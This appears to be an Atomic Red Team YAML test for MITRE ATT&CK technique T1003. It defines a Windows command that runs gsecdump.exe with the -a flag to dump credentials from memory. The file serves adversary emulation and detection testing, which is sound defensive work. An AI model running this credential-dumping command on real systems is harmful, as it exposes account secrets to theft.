Hare Sudhan
19 lines
485 B
YAML
19 lines
485 B
YAML
attack_technique: T1003
|
|
display_name: OS
|
|
atomic_tests:
|
|
- name: Gsecdump
|
|
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
|
|
description: |
|
|
Dump credentials from memory using Gsecdump.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
gsecdump_exe:
|
|
description: Path to the Gsecdump executable
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
|
|
executor:
|
|
command: |
|
|
"#{gsecdump_exe}" -a
|
|
name: command_prompt
|